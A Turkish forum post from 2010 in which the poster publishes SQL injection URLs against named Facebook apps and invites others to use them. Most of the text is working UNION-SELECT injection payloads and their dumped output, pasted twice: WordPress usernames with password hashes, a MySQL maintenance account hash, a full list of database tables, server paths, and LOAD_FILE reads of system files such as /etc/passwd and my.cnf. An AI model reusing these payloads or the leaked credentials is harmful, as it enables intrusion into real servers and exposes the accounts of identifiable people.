- 16 Haz 2010
- 40
- 0
Merhabalar Komutanlarım ve astlarım.Tam hatırlayamıyorum geçen günlerde bir konuda istersem Facebook Hackleyebilirim demiştim.Hacklemedim ama sql açıklarını buldum şimdi onları yayınlıyorum yapmak isteyenlere izin veriyorum.
;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php
;===== BASIC INFO
[email protected]
politicsapp
5.0.45-log
;===== TABLES
# astro
** app
** oscache
** user
# candukincaid
** wp_comment****
** wp_comments
** wp_links
** wp_options
** wp_post****
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_user****
** wp_users
# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan
# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** post****
** posts
** term_relationships
** term_taxonomy
** terms
** user****
** users
# countdownapp
** oscache
** user
# crush
** couple
** oscache
** user
# dare
** flag
** game
** item
** user
# friendiq
** oscache
** score
** user
# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user
# hookup
** couple
** neverblue
** oscache
** user
# jauntlet
** user
# loccus
** checkin
** oscache
** user
# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_post****
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_user****
** wp_users
# maps
** place
** user
# martisor
** user
# mediax
** oscache
** user
# mostlikely
** callback
** statement
** statementforuser
** user
# music
** itemforuser
** oscache
** user
# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle
# plans
** attend
** cache
** event
** place
** user
# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user
# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# projectbasecamp
** clicktimeproject
** clicktimereport
** clickti****sk
** idcorrelation
** projectbudget
** taskforuser
** user
# pwnfriends
** photo
** photoforfriend
** photoforuser
** user
# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user
# seeall
** network
** networkforuser
** test2
** userpref
# send
** app
** item
** itemforuser
** neverblue
** user
# supporter
** oscache
** user
# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user
# tomsapps
** ad
** adclick
** app
** contest
** notification
# travelbug
** bug
** bugcache
** user
# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user
# wikitravel
** badmap
** wikitravelimage
** wikitravelpage
---------------------------------------------------------------------------------------------------------------------------------------------------
load_file = yes magic_quotes = off
User: root@localhost
Version: 5.1.37-1ubuntu5.4
[!] Found /etc/hosts
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/hosts'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/mysql/my.cnf
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/mysql/my.cnf'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/group
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/group'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1
;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1
admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1
admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk
-----
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--
admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php
;===== BASIC INFO
[email protected]
politicsapp
5.0.45-log
;===== TABLES
# astro
** app
** oscache
** user
# candukincaid
** wp_comment****
** wp_comments
** wp_links
** wp_options
** wp_post****
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_user****
** wp_users
# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan
# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** post****
** posts
** term_relationships
** term_taxonomy
** terms
** user****
** users
# countdownapp
** oscache
** user
# crush
** couple
** oscache
** user
# dare
** flag
** game
** item
** user
# friendiq
** oscache
** score
** user
# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user
# hookup
** couple
** neverblue
** oscache
** user
# jauntlet
** user
# loccus
** checkin
** oscache
** user
# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_post****
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_user****
** wp_users
# maps
** place
** user
# martisor
** user
# mediax
** oscache
** user
# mostlikely
** callback
** statement
** statementforuser
** user
# music
** itemforuser
** oscache
** user
# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle
# plans
** attend
** cache
** event
** place
** user
# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user
# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user
# projectbasecamp
** clicktimeproject
** clicktimereport
** clickti****sk
** idcorrelation
** projectbudget
** taskforuser
** user
# pwnfriends
** photo
** photoforfriend
** photoforuser
** user
# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user
# seeall
** network
** networkforuser
** test2
** userpref
# send
** app
** item
** itemforuser
** neverblue
** user
# supporter
** oscache
** user
# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user
# tomsapps
** ad
** adclick
** app
** contest
** notification
# travelbug
** bug
** bugcache
** user
# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user
# wikitravel
** badmap
** wikitravelimage
** wikitravelpage
---------------------------------------------------------------------------------------------------------------------------------------------------
load_file = yes magic_quotes = off
- Gathering MySQL Server Configuration...
User: root@localhost
Version: 5.1.37-1ubuntu5.4
- Do we have Access to MySQL Database: YES <-- w00t w00t
- Dumping MySQL user info. user
assword:host - Number of users in the mysql.user table: 4[0] root::localhost
[1] root::ip-10-128-57-239
[2] root::127.0.0.1
[3] debian-sys-maint:*79E5005DD3B60F9100ACF7571D5DC9079388F408:localhost
- Do we have Access to Load_File: YES <-- w00t w00t
- Starting Load_File Fuzzer...
- Number of tables names to be fuzzed: 236[!] Found /etc/passwd
[!]
[!] Found /etc/hosts
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/hosts'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/mysql/my.cnf
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/mysql/my.cnf'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/group
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/group'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
